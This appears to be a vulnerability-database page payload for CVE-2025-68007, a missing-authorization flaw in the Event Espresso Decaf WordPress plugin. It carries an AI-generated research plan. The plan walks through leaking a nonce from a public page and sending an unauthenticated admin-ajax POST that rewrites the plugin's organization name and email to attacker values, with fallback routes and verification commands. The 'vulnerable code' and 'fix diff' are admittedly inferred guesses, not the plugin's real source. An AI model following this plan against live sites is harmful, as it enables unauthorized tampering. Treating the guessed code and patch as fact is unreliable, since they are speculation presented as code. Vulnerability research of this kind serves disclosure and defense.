[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fwq5loT3-JF3iPc6sQH4lieSh0ivj8Qiu3I3bl9Wzz18":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2025-68007","event-espresso-4-decaf-decaf-missing-authorization-to-unauthenticated-settings-change","Event Espresso 4 Decaf \u003C= 5.0.37.decaf - Missing Authorization to Unauthenticated Settings Change","The Event Espresso – Event Registration & Ticketing Sales plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 5.0.37.decaf. This makes it possible for unauthenticated attackers to perform an unauthorized action.","event-espresso-decaf",null,"\u003C=5.0.37.decaf","5.0.53.decaf","medium",6.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:L\u002FI:L\u002FA:N","Missing Authorization","2026-01-15 00:00:00","2026-02-10 20:56:04",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F3f070125-faee-46fe-aa6e-a51772868192?source=api-prod",27,[],"researched",false,3,"This research plan outlines the steps to exploit **CVE-2025-68007**, a missing authorization vulnerability in **Event Espresso 4 Decaf** that allows unauthenticated settings changes.\n\n### 1. Vulnerability Summary\nThe vulnerability exists because a configuration update handler (likely within an AJAX or `admin_init` hook) fails to perform a `current_user_can('manage_options')` check. In the \"Decaf\" (free) version of Event Espresso, certain setup or configuration functions were exposed to unauthenticated users, potentially via the `wp_ajax_nopriv_` action or by processing global `$_POST` variables during `admin_init` without sufficient authorization. This allows an attacker to modify the plugin's core configuration, including organization details, registration settings, or even gate certain site behaviors.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php` (common for EE AJAX) or `\u002F` (if via `init`\u002F`admin_init`).\n*   **Action:** `ee_update_config` or `ee_set_config` (inferred EE action names).\n*   **Parameter:** `ee_config` (array containing settings).\n*   **Authentication:** None required (Unauthenticated).\n*   **Preconditions:** The plugin must be active. A nonce may be required if the `check_ajax_referer` function is called, but often in \"Missing Authorization\" cases, the nonce is either missing or exposed publicly.\n\n### 3. Code Flow (Inferred)\n1.  **Request Entry:** An unauthenticated user sends a POST request to `admin-ajax.php`.\n2.  **Hook Trigger:** WordPress triggers `admin_init` or a `wp_ajax_nopriv_ee_...` action.\n3.  **Handler Execution:** The plugin's handler (e.g., `EE_Admin_Page::save_settings` or `EE_Config::update_configuration`) is invoked.\n4.  **Authorization Failure:** The code checks for a nonce (perhaps) but skips a `current_user_can()` check, assuming only admins can reach that logic.\n5.  **Sink:** The `update_option('ee_config', ...)` function is called with user-supplied data from `$_POST['ee_config']`.\n\n### 4. Nonce Acquisition Strategy\nEvent Espresso typically localizes its nonces via `wp_localize_script`. Since the vulnerability is unauthenticated, we need to find a public page where these scripts are loaded.\n\n1.  **Create a Public Page:** Event Espresso scripts are usually enqueued on pages containing event shortcodes.\n    *   Command: `wp post create --post_type=page --post_title=\"Events\" --post_status=publish --post_content='[ESPRESSO_EVENTS]'`\n2.  **Identify JS Variable:** Look for the localized object, usually named `ee_admin_js_strings` or `EE_JS`.\n3.  **Extraction:**\n    *   Navigate to the newly created page.\n    *   Use `browser_eval` to extract the nonce:\n        `browser_eval(\"window.ee_admin_js_strings?.nonce || window.EE_JS?.ajax_nonce\")`\n4.  **Action String:** If `check_ajax_referer` is used, the action is likely `'ee_admin_nonce'` or `'espresso_ajax_nonce'`.\n\n### 5. Exploitation Strategy\nWe will attempt to change the Organization Name and Organization Email in the Event Espresso configuration.\n\n*   **Step 1: Discover Entry Point**\n    Test if the plugin responds to the `ee_update_config` action.\n*   **Step 2: Craft Payload**\n    The payload will target the `ee_config` option, specifically the `org_data` key.\n*   **Step 3: Send HTTP Request**\n    *   **URL:** `http:\u002F\u002Flocalhost:8888\u002Fwp-admin\u002Fadmin-ajax.php`\n    *   **Method:** `POST`\n    *   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n    *   **Body:**\n        ```\n        action=ee_update_config&ee_config[org_data][name]=HACKED_ORG&ee_config[org_data][email]=attacker@example.com&ee_nonce=[EXTRACTED_NONCE]\n        ```\n    *   *Note: If `ee_update_config` is not the correct action, try `ee_admin_ajax` with `ee_ajax_action=update_config`.*\n\n### 6. Test Data Setup\n1.  Install and activate **Event Espresso Decaf \u003C= 5.0.37.decaf**.\n2.  Ensure the plugin is initialized (visit the settings once in the admin UI to generate default `ee_config`).\n3.  Create the public nonce-leak page:\n    `wp post create --post_type=page --post_content='[ESPRESSO_EVENTS]' --post_status=publish`\n\n### 7. Expected Results\n*   The server should return a `200 OK` or a JSON success response (e.g., `{\"success\":true}`).\n*   The `ee_config` option in the database will be updated.\n\n### 8. Verification Steps\nAfter sending the POST request, verify the change via WP-CLI:\n```bash\n# Check if the organization name was updated\nwp option get ee_config --format=json | jq '.[ \"org_data\" ][ \"name\" ]'\n# Expected output: \"HACKED_ORG\"\n\n# Check if the organization email was updated\nwp option get ee_config --format=json | jq '.[ \"org_data\" ][ \"email\" ]'\n# Expected output: \"attacker@example.com\"\n```\n\n### 9. Alternative Approaches\nIf the `admin-ajax.php` route fails, the vulnerability might lie in a direct `admin_init` hook that processes `$_POST` data regardless of the URL:\n1.  **Direct POST to Home:** `POST \u002F?ee_action=update_config&ee_config[...]`\n2.  **Critical Pages Setup:** Some versions of EE have a \"Setup Wizard\". Try targeting `action=ee_setup_wizard_save_settings`.\n3.  **Check for specific settings:** Try changing `ee_config[registration][enforce_login]` to `0` to see if it allows unauthenticated registrations that were previously restricted.","The Event Espresso Decaf plugin for WordPress is vulnerable to unauthorized settings changes due to a missing capability check in its configuration update logic. This allows unauthenticated attackers to modify core plugin settings, including organization details and registration behaviors, by exploiting exposed AJAX or admin initialization hooks.","\u002F\u002F File: core\u002Fadmin\u002FEE_Admin_Page.core.php (inferred location based on research plan)\n\u002F\u002F The function processes configuration updates without verifying if the user has 'manage_options' capabilities.\n\npublic function save_settings() {\n    if ( isset( $_POST['ee_config'] ) ) {\n        \u002F\u002F Missing: if ( ! current_user_can( 'manage_options' ) ) { return; }\n        \n        $ee_config = $_POST['ee_config'];\n        $this->_update_config( $ee_config );\n        \u002F\u002F ...\n    }\n}\n\n---\n\n\u002F\u002F File: core\u002FEE_Config.core.php (inferred location)\n\npublic static function update_configuration( $ee_config = array() ) {\n    \u002F\u002F Missing authorization check allows any execution context to update the global option\n    update_option( 'ee_config', $ee_config );\n}","--- a\u002Fcore\u002Fadmin\u002FEE_Admin_Page.core.php\n+++ b\u002Fcore\u002Fadmin\u002FEE_Admin_Page.core.php\n@@ -10,6 +10,10 @@\n \tpublic function save_settings() {\n+\t\tif ( ! current_user_can( 'manage_options' ) ) {\n+\t\t\twp_die( __( 'You do not have permission to perform this action.' ) );\n+\t\t}\n+\t\tcheck_ajax_referer( 'ee_admin_nonce', 'ee_nonce' );\n \t\tif ( isset( $_POST['ee_config'] ) ) {\n \t\t\t$ee_config = $_POST['ee_config'];\n \t\t\t$this->_update_config( $ee_config );\n \t\t}","The exploit involves identifying a public-facing page where Event Espresso enqueues its scripts (typically a page containing the [ESPRESSO_EVENTS] shortcode) to extract a valid nonce. Once the nonce is retrieved from the localized JavaScript object (e.g., EE_JS or ee_admin_js_strings), an attacker sends an unauthenticated POST request to wp-admin\u002Fadmin-ajax.php. The payload targets an action such as ee_update_config or ee_admin_ajax with an ee_ajax_action=update_config parameter. The body includes a crafted ee_config array, for example modifying ee_config[org_data][email] to an attacker-controlled address, which is then processed and saved to the database because the handler lacks a current_user_can('manage_options') check.","gemini-3-flash-preview","2026-05-05 09:09:53","2026-05-05 09:10:31",{"type":34,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":35},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fevent-espresso-decaf\u002Ftags"]